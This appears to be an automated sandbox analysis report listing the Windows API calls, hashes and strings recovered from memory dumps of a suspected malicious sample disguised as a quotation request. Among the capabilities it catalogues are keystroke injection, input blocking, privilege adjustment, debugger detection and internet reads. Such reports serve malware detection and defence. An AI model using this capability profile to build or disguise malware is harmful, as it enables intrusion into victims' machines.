• Instruction Fuzzy Hash: 3721A6B1B402155FD7208F1AC844BA67BE5FF86334F1A8058E8468B351C775EC42EBD4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
• Opcode ID: 8fb11b3f419f5907818f009c4094adcf53fe76ee110bfd6cd585696356fbd22d
• Instruction ID: 09825318d2da924827cb65f914169c3a8859b0eb85784619a54587248d313422
• Opcode Fuzzy Hash: 8fb11b3f419f5907818f009c4094adcf53fe76ee110bfd6cd585696356fbd22d
• Instruction Fuzzy Hash: 54A28D71E0061ACBDF24CF58C9507EDB7B1BB54761F2481AAED15A7280EB309DC6EB90
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00F9A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 00F9A6BA
  • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
• Process32NextW.KERNEL32(00000000,?), ref: 00F9A79C
• CloseHandle.KERNEL32(00000000), ref: 00F9A7AB
  • Part of subcall function 00F2CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F53303,?), ref: 00F2CE8A
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F7AAAC
• SetKeyboardState.USER32(00000080), ref: 00F7AAC8
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F7AB36
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F7AB88
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 00F8CE89
• GetLastError.KERNEL32(?,00000000), ref: 00F8CEEA
• SetEvent.KERNEL32(?,?,00000000), ref: 00F8CEFE
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
APIs
• lstrlenW.KERNEL32(?,00F55222), ref: 00F7DBCE
• GetFileAttributesW.KERNEL32(?), ref: 00F7DBDD
• FindFirstFileW.KERNEL32(?,?), ref: 00F7DBEE
• FindClose.KERNEL32(00000000), ref: 00F7DBFA
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F782AA
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F85CC1
• FindNextFileW.KERNEL32(00000000,?), ref: 00F85D17
• FindClose.KERNEL32(?), ref: 00F85D5F
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
APIs
• IsDebuggerPresent.KERNEL32 ref: 00F4271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F42724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00F42731
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F851DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F85238
• SetErrorMode.KERNEL32(00000000), ref: 00F852A1
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 00F2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F30668
  • Part of subcall function 00F2FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F30685
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F7173A
• GetLastError.KERNEL32 ref: 00F7174A
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F7D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00F7D645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F7D650
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F7168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F716A1
• FreeSid.ADVAPI32(?), ref: 00F716B1
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• GetCurrentProcess.KERNEL32(00F428E9,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002,00000000,?,00F428E9), ref: 00F34D09
• TerminateProcess.KERNEL32(00000000,?,00F34CBE,00F428E9,00FD88B8,0000000C,00F34E15,00F428E9,00000002,00000000,?,00F428E9), ref: 00F34D10
• ExitProcess.KERNEL32 ref: 00F34D22
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
Strings
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00F6D28C
Strings
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00F86918
• FindClose.KERNEL32(00000000), ref: 00F86961
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F94891,?,?,00000035,?), ref: 00F837E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F94891,?,?,00000035,?), ref: 00F837F4
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
                                                                                                                    • Opcode ID: 0d7e505d9230bb352af77b919dc0fe6862a0ea7e5c02ee65f588689683d3a4d2
                                                                                                                    • Instruction ID: 1cf98f57ced605e612b1ed233419090075cf1affcdbb3f75671321deaa1d13b4
                                                                                                                    • Opcode Fuzzy Hash: 0d7e505d9230bb352af77b919dc0fe6862a0ea7e5c02ee65f588689683d3a4d2
                                                                                                                    • Instruction Fuzzy Hash: 82F0E5B16083292AEB2027668C4DFEB3AAEEFC5B61F000175F509D2291D9A09944D7F0
                                                                                                                    APIs
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F7B25D
                                                                                                                    • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00F7B270
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3536248340-0
                                                                                                                    • Opcode ID: bad2e2111c267f35d4f88ae1c39f124d006429296c8a1d05227b16de45e29c40
                                                                                                                    • Instruction ID: 1a3ea2ac728fd1c349afb41a4195f9ec151af25b705d897aee6a77f92e883d8b
                                                                                                                    • Opcode Fuzzy Hash: bad2e2111c267f35d4f88ae1c39f124d006429296c8a1d05227b16de45e29c40
                                                                                                                    • Instruction Fuzzy Hash: C2F01D7180424DABDB059FA0C805BBE7BB4FF09319F04800AF955A5192C7798611EF95
                                                                                                                    APIs
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F711FC), ref: 00F710D4
                                                                                                                    • CloseHandle.KERNEL32(?,?,00F711FC), ref: 00F710E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    • Opcode ID: 7da9d1ae50c9b2b4408771a6d90886592c56d1814bce19c6e18175cb7532ce52
                                                                                                                    • Instruction ID: 0514453781fee335ad85930983739fd0820b29c5ee54ac5353291c8b8a86a99f
                                                                                                                    • Opcode Fuzzy Hash: 7da9d1ae50c9b2b4408771a6d90886592c56d1814bce19c6e18175cb7532ce52
                                                                                                                    • Instruction Fuzzy Hash: C1E0BF72414610AEF7252B55FC05E7777A9EF05320B14C82EF5A6804B1DB626C94EB50
                                                                                                                    Strings
                                                                                                                    • Variable is not of type 'Object'., xrefs: 00F60C40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Variable is not of type 'Object'.
                                                                                                                    • API String ID: 0-1840281001
                                                                                                                    • Opcode ID: d47e7e45c4aba19673204b89e5bc50577d544079c9a1d200dbd457d1540589d7
                                                                                                                    • Instruction ID: 516f6a1b03181ede6e80e3a35b295478c87a84e1a201a30ee190de9dea823cea
                                                                                                                    • Opcode Fuzzy Hash: d47e7e45c4aba19673204b89e5bc50577d544079c9a1d200dbd457d1540589d7
                                                                                                                    • Instruction Fuzzy Hash: 9B329E31D40218DFCF14DF90D881BEEB7B5BF15314F248059E806AB292DB75AD86EBA1
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F46766,?,?,00000008,?,?,00F4FEFE,00000000), ref: 00F46998
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    • Opcode ID: a049aceb04a21786fcacd38b5e7b45afd24153aa98f4b7e7acc12fd48b882e49
                                                                                                                    • Instruction ID: ac7f79ed9e97b0c9099b83bfe9719a6c352fadc8cd26319b109b4dacf9533854
                                                                                                                    • Opcode Fuzzy Hash: a049aceb04a21786fcacd38b5e7b45afd24153aa98f4b7e7acc12fd48b882e49
                                                                                                                    • Instruction Fuzzy Hash: 4FB15A32A106089FD719CF28C48AB657FE0FF46364F258658EC99CF2A2C735E981DB41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 0-3916222277
                                                                                                                    • Opcode ID: 05032a61a5206a586b7314abb3bc315c47e3a1d65d7519c422dd55d0decdcac2
                                                                                                                    • Instruction ID: f42512728ffd1ffaed5edd00e7508ab2fa833c51ea1ff43160a61baf3b4d04ff
                                                                                                                    • Opcode Fuzzy Hash: 05032a61a5206a586b7314abb3bc315c47e3a1d65d7519c422dd55d0decdcac2
                                                                                                                    • Instruction Fuzzy Hash: 5F126E71D002299BCB24DF58D8917EEB7F5FF48310F14819AE849EB251EB349E81EB90
                                                                                                                    APIs
                                                                                                                    • BlockInput.USER32(00000001), ref: 00F8EABD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BlockInput
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3456056419-0
                                                                                                                    • Opcode ID: dff70facf044d998e298d7577d72d2728f5d46ae096e058df3a2c2c63b8ed512
                                                                                                                    • Instruction ID: d04f599df1d6e20061184d993b574be30c0edbc84a11a0c93c3176922ccbd182
                                                                                                                    • Opcode Fuzzy Hash: dff70facf044d998e298d7577d72d2728f5d46ae096e058df3a2c2c63b8ed512
                                                                                                                    • Instruction Fuzzy Hash: 50E04F322002049FC710EF59D804EDAF7E9AF98770F048416FC49C7351DB74E8819BA0
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00F303EE), ref: 00F309DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: ebb2b841400283a49fcc91d093c12057f4637e541e18f11ab124a6ebce57aa73
                                                                                                                    • Instruction ID: df6577423455aa1cf95e483709b0190d169b60b5a887982c142aa7488a14baaf
                                                                                                                    • Opcode Fuzzy Hash: ebb2b841400283a49fcc91d093c12057f4637e541e18f11ab124a6ebce57aa73
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 0-4108050209
                                                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                    • Instruction ID: ce5a7c3651295effc828a2114b6b761e8187784c81ba9eefb021d64917570584
                                                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                    • Instruction Fuzzy Hash: FA5138E2E0D7456BDF38B568885A7BF73C59B02370F280A09E882D7282C619DE06F351
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FA712F
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA7160
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FA716C
                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00FA7186
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA7195
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FA71C0
                                                                                                                    • GetSysColor.USER32(00000010), ref: 00FA71C8
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00FA71CF
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00FA71DE
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FA71E5
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00FA7230
                                                                                                                    • FillRect.USER32(?,?,?), ref: 00FA7262
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA7284
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColor.USER32(00000012), ref: 00FA7421
                                                                                                                      • Part of subcall function 00FA73E8: SetTextColor.GDI32(?,?), ref: 00FA7425
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColorBrush.USER32(0000000F), ref: 00FA743B
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColor.USER32(0000000F), ref: 00FA7446
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColor.USER32(00000011), ref: 00FA7463
                                                                                                                      • Part of subcall function 00FA73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FA7471
                                                                                                                      • Part of subcall function 00FA73E8: SelectObject.GDI32(?,00000000), ref: 00FA7482
